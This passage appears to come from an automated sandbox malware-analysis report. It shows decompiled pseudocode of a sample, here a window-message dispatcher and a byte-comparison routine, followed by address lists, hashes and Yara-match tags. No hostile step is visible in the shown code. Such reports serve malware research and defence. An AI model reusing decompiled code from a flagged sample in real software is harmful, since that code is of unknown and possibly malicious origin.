										( *(_t234 - 0x18))[1] = _t175;
										E0040CD27(_t234 - 0x14);
										L29:
										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
										__eflags = _t222 - 0x53;
										if(__eflags > 0) {
											goto L118;
										}
										switch( *((intOrPtr*)(_t222 * 4 +  &M004108F3))) {
											case 0:
												_push(E00414668(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L50;
											case 3:
												_push(__esi);
												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 5:
												__ecx = __ebp - 0x28;
												E004141D8(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E0040CD71(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E0040E23A(__ebx, __ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x24;
														__eax = E00420D2A(__eax + 0x24,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												_t84 = __ebp - 0x5c;
												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
												__eflags =  *_t84;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E0040EBF1(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E004141D8(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E004146E5(__ecx);
												goto L118;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040E20E(__ebx, __ecx, __esi);
												goto L62;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L114;
											case 0xa:
												_push(E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L62:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L50:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0xb:
												_push(__esi);
												goto L110;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L66;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L69;
											case 0xf:
												_push(__esi >> 0x10);
												__eax = __si;
												goto L69;
											case 0x10:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x11:
												__eax = E0040E20E(__ebx, __ecx, __esi);
												goto L48;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E0040E20E(__ebx, __ecx,  *(__ebp + 0xc)));
												_push(E0040E20E(__ebx, __ecx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E00414668(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E0040E20E(__ebx, __ecx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040E20E(__ebx, __ecx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E0040E20E(__ebx, __ecx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
												E0040CD27(_t234 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E0041F7CC(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E0040E20E(__ebx, __ecx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t234 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E0040CD27(_t234 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t234 + 0x10) - _t182[2];
								if( *(_t234 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t234 + 0x10) = _t205;
								E0040CD27(_t234 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t234 + 8) - 0xc000;
								if( *(_t234 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E0040FD93(_t198, _t231, _t231, _t233, _t233 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t234 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t234 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
								}
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E0040CD27(_t234 - 0x14);
								_t172 = 1;
								L40:
								return E00429303(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t234 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t234 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t234 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
					goto L6;
				}
				_push( *(_t234 + 0x10));
				_push( *((intOrPtr*)(_t234 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
					goto L39;
				}
				goto L2;
			}

























                  0x0041032f
                  0x0041032f
                  0x00410336
                  0x0041033b
                  0x0041033f
                  0x00410342
                  0x00410349
                  0x0041034c
                  0x00410355
                  0x00410379
                  0x0041037c
                  0x004103a8
                  0x004103ab
                  0x004103ae
                  0x004103bb
                  0x004103bb
                  0x004103c0
                  0x004103c3
                  0x004103d9
                  0x004103d9
                  0x004103dc
                  0x004103de
                  0x0041042d
                  0x00410431
                  0x0041043e
                  0x00410447
                  0x00410452
                  0x00410458
                  0x0041045b
                  0x0041045d
                  0x0041048d
                  0x0041048d
                  0x00410490
                  0x00410496
                  0x00410498
                  0x00410527
                  0x00410527
                  0x0041052a
                  0x00000000
                  0x00000000
                  0x004104a0
                  0x004104a7
                  0x004104a9
                  0x004104ab
                  0x004104ef
                  0x004104f4
                  0x00410512
                  0x00410517
                  0x00410519
                  0x0041051b
                  0x00000000
                  0x00000000
                  0x004104fd
                  0x004104ff
                  0x004108bb
                  0x004108be
                  0x004108c3
                  0x004108c3
                  0x004108c6
                  0x004108c6
                  0x004108c7
                  0x004108c7
                  0x004108ca
                  0x004108cc
                  0x004108ce
                  0x004108ce
                  0x00000000
                  0x004108ce
                  0x00410505
                  0x00410507
                  0x00410509
                  0x0041050e
                  0x0041050e
                  0x00410511
                  0x00410511
                  0x0041051d
                  0x00410520
                  0x00410522
                  0x00410524
                  0x00000000
                  0x00410524
                  0x004104ad
                  0x004104b0
                  0x004104b3
                  0x004104b8
                  0x004104bb
                  0x004104bd
                  0x00000000
                  0x00000000
                  0x004104c2
                  0x004104c8
                  0x004104cd
                  0x004104d6
                  0x004104d9
                  0x004104dc
                  0x00000000
                  0x00000000
                  0x004104e2
                  0x00000000
                  0x0041056d
                  0x00000000
                  0x00000000
                  0x00410577
                  0x00000000
                  0x00000000
                  0x00410591
                  0x00410593
                  0x00410593
                  0x00410596
                  0x00410597
                  0x0041059a
                  0x0041059e
                  0x00000000
                  0x00000000
                  0x004105ad
                  0x004105b1
                  0x00000000
                  0x00000000
                  0x004105b8
                  0x0041056e
                  0x0041056e
                  0x00410570
                  0x00000000
                  0x00000000
                  0x004105bb
                  0x004105c3
                  0x004105c6
                  0x004105c9
                  0x004105cd
                  0x004105d0
                  0x004105d5
                  0x004105d7
                  0x004105db
                  0x004105df
                  0x004105e2
                  0x004105e7
                  0x004105e9
                  0x004105eb
                  0x004105ee
                  0x004105f0
                  0x004105f5
                  0x004105f8
                  0x004105fd
                  0x004105ff
                  0x00410601
                  0x00410601
                  0x004105ff
                  0x00410604
                  0x00410604
                  0x00410607
                  0x00410608
                  0x00410609
                  0x0041060c
                  0x0041060d
                  0x0041060f
                  0x00410611
                  0x00410615
                  0x00410615
                  0x00410615
                  0x00410619
                  0x0041061c
                  0x0041061f
                  0x00410623
                  0x00000000
                  0x00000000
                  0x00410639
                  0x00410641
                  0x00410644
                  0x00410647
                  0x0041064a
                  0x0041064d
                  0x0041064e
                  0x00410650
                  0x00410654
                  0x00410656
                  0x0041065a
                  0x00410628
                  0x00410628
                  0x0041062b
                  0x0041062f
                  0x00000000
                  0x00000000
                  0x0041065f
                  0x00410662
                  0x00410662
                  0x00410665
                  0x00410667
                  0x00000000
                  0x00000000
                  0x00410679
                  0x0041067c
                  0x0041067d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041068c
                  0x0041068d
                  0x00410690
                  0x0041066c
                  0x0041066c
                  0x0041066d
                  0x004105a3
                  0x004105a3
                  0x004105a4
                  0x004105a6
                  0x00000000
                  0x00000000
                  0x004108ab
                  0x00000000
                  0x00000000
                  0x00410695
                  0x00000000
                  0x00000000
                  0x004106a1
                  0x004106a3
                  0x00000000
                  0x00000000
                  0x004106aa
                  0x004106ad
                  0x004106ad
                  0x004106b0
                  0x004106b1
                  0x00000000
                  0x00000000
                  0x004106c1
                  0x004106c2
                  0x00000000
                  0x00000000
                  0x004106c7
                  0x004106c9
                  0x004106c9
                  0x004106cc
                  0x004106cd
                  0x00000000
                  0x00000000
                  0x00410586
                  0x00000000
                  0x00000000
                  0x0041057c
                  0x0041057e
                  0x00000000
                  0x00000000
                  0x004106e5
                  0x004106ec
                  0x004106ed
                  0x004106ef
                  0x004106f2
                  0x004106f2
                  0x004106f2
                  0x00000000
                  0x00000000
                  0x004106fb
                  0x00000000
                  0x00000000
                  0x00410706
                  0x00000000
                  0x00000000
                  0x0041070f
                  0x00410713
                  0x00410714
                  0x00410717
                  0x0041071b
                  0x00000000
                  0x00000000
                  0x00410722
                  0x00000000
                  0x00000000
                  0x0041072c
                  0x00410725
                  0x00410725
                  0x00410700
                  0x00410700
                  0x00000000
                  0x00000000
                  0x0041072f
                  0x00410731
                  0x00410731
                  0x00410734
                  0x00410735
                  0x00000000
                  0x00000000
                  0x00410743
                  0x00410746
                  0x00410749
                  0x0041074c
                  0x00410738
                  0x00410738
                  0x0041073c
                  0x00000000
                  0x00000000
                  0x0041074f
                  0x00410753
                  0x00000000
                  0x00000000
                  0x0041075d
                  0x00410760
                  0x00410760
                  0x00410763
                  0x00410765
                  0x00000000
                  0x00000000
                  0x00410771
                  0x00410774
                  0x00410777
                  0x0041077a
                  0x0041077d
                  0x00410780
                  0x00410783
                  0x00410786
                  0x0041079a
                  0x0041079b
                  0x00000000
                  0x0041079b
                  0x0041078e
                  0x0041078f
                  0x00410792
                  0x00000000
                  0x00000000
                  0x004107a1
                  0x00410698
                  0x00410698
                  0x0041069a
                  0x00000000
                  0x00000000
                  0x004107a7
                  0x004107a8
                  0x004107ab
                  0x004107ad
                  0x00000000
                  0x00000000
                  0x00410555
                  0x00410558
                  0x0041055b
                  0x0041055e
                  0x0041055f
                  0x0041055f
                  0x00000000
                  0x00000000
                  0x004107b4
                  0x004107b7
                  0x004107b8
                  0x0041076a
                  0x0041076a
                  0x0041076b
                  0x004106f5
                  0x004106f5
                  0x00000000
                  0x00000000
                  0x004107bd
                  0x004107c0
                  0x004107c3
                  0x004107c6
                  0x004106d0
                  0x004106d0
                  0x004106d1
                  0x004106d4
                  0x004106d4
                  0x004106d6
                  0x00000000
                  0x00000000
                  0x004107cc
                  0x004107cf
                  0x004107d2
                  0x004107d5
                  0x004107d6
                  0x004107da
                  0x004107dd
                  0x004107de
                  0x004107e2
                  0x004107e3
                  0x004107e5
                  0x004107e7
                  0x0041039b
                  0x0041039b
                  0x0041039d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004107ef
                  0x004107f2
                  0x004107f5
                  0x004107f8
                  0x004107f9
                  0x004107fd
                  0x00410800
                  0x00410801
                  0x00410805
                  0x00410806
                  0x00410808
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041080f
                  0x00410811
                  0x00410813
                  0x00410816
                  0x00410818
                  0x00000000
                  0x00000000
                  0x0041053f
                  0x0041053f
                  0x00410546
                  0x0041054b
                  0x0041054b
                  0x00000000
                  0x00000000
                  0x00410824
                  0x0041058b
                  0x0041058b
                  0x004108ac
                  0x004108ac
                  0x00000000
                  0x00000000
                  0x00410834
                  0x00000000
                  0x00000000
                  0x0041083a
                  0x0041083e
                  0x00000000
                  0x00000000
                  0x00410848
                  0x0041084b
                  0x0041084c
                  0x0041084e
                  0x00410851
                  0x00410853
                  0x00410859
                  0x0041085a
                  0x0041085a
                  0x0041085f
                  0x00410863
                  0x00000000
                  0x00000000
                  0x00410872
                  0x00410876
                  0x004106b5
                  0x004106b5
                  0x004108af
                  0x004108af
                  0x004108b1
                  0x00000000
                  0x00000000
                  0x0041087c
                  0x0041087f
                  0x00410882
                  0x00410885
                  0x00410886
                  0x0041088a
                  0x0041088d
                  0x0041088e
                  0x00410868
                  0x00410868
                  0x00000000
                  0x00000000
                  0x00410894
                  0x00410897
                  0x0041089a
                  0x0041089d
                  0x0041089e
                  0x004108a2
                  0x004108a5
                  0x004108a6
                  0x00410869
                  0x00410869
                  0x0041086b
                  0x00000000
                  0x00000000
                  0x004104e2
                  0x00410530
                  0x00410533
                  0x00410533
                  0x00410533
                  0x0041053a
                  0x00000000
                  0x0041053a
                  0x00410462
                  0x00410464
                  0x00410467
                  0x00000000
                  0x00000000
                  0x00410469
                  0x0041046f
                  0x00410472
                  0x00410477
                  0x00410479
                  0x00000000
                  0x00000000
                  0x0041047f
                  0x00410486
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410488
                  0x004103e0
                  0x004103e4
                  0x00000000
                  0x00000000
                  0x004103e6
                  0x004103ec
                  0x004103f6
                  0x004103f6
                  0x004103fc
                  0x00410406
                  0x0041040c
                  0x0041040f
                  0x00000000
                  0x00000000
                  0x00410411
                  0x0041041f
                  0x00410425
                  0x00410427
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410427
                  0x004103fe
                  0x00410404
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410404
                  0x004103ee
                  0x004103f4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004103c5
                  0x004103d0
                  0x004103d5
                  0x004103d7
                  0x0041036d
                  0x0041036d
                  0x004108d1
                  0x004108d1
                  0x004108d6
                  0x004108db
                  0x004108db
                  0x004108dd
                  0x004108e4
                  0x004108eb
                  0x0041054d
                  0x00410552
                  0x00410552
                  0x00000000
                  0x004103d7
                  0x004103c3
                  0x0041037e
                  0x00410381
                  0x00410383
                  0x00000000
                  0x00000000
                  0x0041038e
                  0x0041038f
                  0x00410390
                  0x00410395
                  0x00000000
                  0x00410395
                  0x00410357
                  0x0041035c
                  0x00410367
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID:
                  • API String ID: 431132790-0
                  • Opcode ID: 0ca6b6c23720b79fe6d1d534efebe6f37779338159e608e25ba41da051b062a7
                  • Instruction ID: 272999bfce609d1bbf838bf6bc52ebe8c42bd7f7b6864a752bc20ed9ec0a6e55
                  • Opcode Fuzzy Hash: 0ca6b6c23720b79fe6d1d534efebe6f37779338159e608e25ba41da051b062a7
                  • Instruction Fuzzy Hash: 94F18F70500219EFDF14EF55C880AFE77A9EF04314F10852AF816AB292DBB8D9D1DB69
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 002C50E8, Relevance: 1.7, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`,
                  • API String ID: 0-4081356169
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: c5239c7f14ef79e4807467598ba2817cca7f4a7c2390d36f98edcba9a48c3c5e
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 0A024330521F618FC736CF29C684A66B7F1BF547207644A2EC6E786E90D272F891CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 002C50E4, Relevance: 1.5, Strings: 1, Instructions: 239UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`,
                  • API String ID: 0-4081356169
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: ee98fcbeda8360b56a79b09779a87b9751831d47992e394cba15cfb9d2706801
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: 5BA15330520F218FC735CF29CA84A66B7F4BF54720B644A2EC5EB86A90E371F891CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0042A547, Relevance: .4, Instructions: 384COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042A547(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
